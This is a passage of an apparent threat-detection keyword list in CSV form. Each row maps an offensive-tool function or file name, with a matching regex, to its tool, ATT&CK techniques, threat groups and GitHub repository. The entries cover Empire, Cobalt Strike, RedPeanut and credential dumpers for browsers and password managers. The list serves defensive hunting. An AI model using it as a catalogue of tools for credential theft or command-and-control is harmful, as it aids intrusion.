- T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*GetBearerToken.exe https://*.sharepoint.com*",".{0,1000}GetBearerToken\.exe\shttps\:\/\/.{0,1000}\.sharepoint\.com.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*Get-BloodHoundData*",".{0,1000}Get\-BloodHoundData.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-BootKey*",".{0,1000}Get\-BootKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-BrowserData.ps1*",".{0,1000}Get\-BrowserData\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-BrowserInformation*",".{0,1000}Get\-BrowserInformation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetC2Server*",".{0,1000}GetC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CachedGPPPassword*",".{0,1000}Get\-CachedGPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*getcap not found in PATH, cannot escalate using capabilities*",".{0,1000}getcap\snot\sfound\sin\sPATH,\scannot\sescalate\susing\scapabilities.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Get-ChromeBookmarks*",".{0,1000}Get\-ChromeBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ChromeDump*",".{0,1000}Get\-ChromeDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ChromeHistory*",".{0,1000}Get\-ChromeHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetChromeSecrets*",".{0,1000}GetChromeSecrets.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*GETCLIPBOARD*GETLOCALGROUP*",".{0,1000}GETCLIPBOARD.{0,1000}GETLOCALGROUP.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Get-ClipboardContents*",".{0,1000}Get\-ClipboardContents.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ClipboardContents.ps1*",".{0,1000}Get\-ClipboardContents\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CLSIDRegistryKeys -RegHive *",".{0,1000}Get\-CLSIDRegistryKeys\s\-RegHive\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM 
hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*Get-CompressedAgent*",".{0,1000}Get\-CompressedAgent.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedAgent.ps1*",".{0,1000}Get\-CompressedAgent\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode*",".{0,1000}Get\-CompressedShellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode.ps1*",".{0,1000}Get\-CompressedShellcode\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
"*Get-ComputerDetails*",".{0,1000}Get\-ComputerDetails.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*GetComputersFromActiveDirectory*",".{0,1000}GetComputersFromActiveDirectory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-creditcarddata *",".{0,1000}get\-creditcarddata\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-CredPersist*",".{0,1000}Get\-CredPersist.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*getCreds1passwordappEntries1.h*",".{0,1000}getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCreds1passwordappEntries2.h*",".{0,1000}getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCreds1passwordappMaster.h*",".{0,1000}getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" 
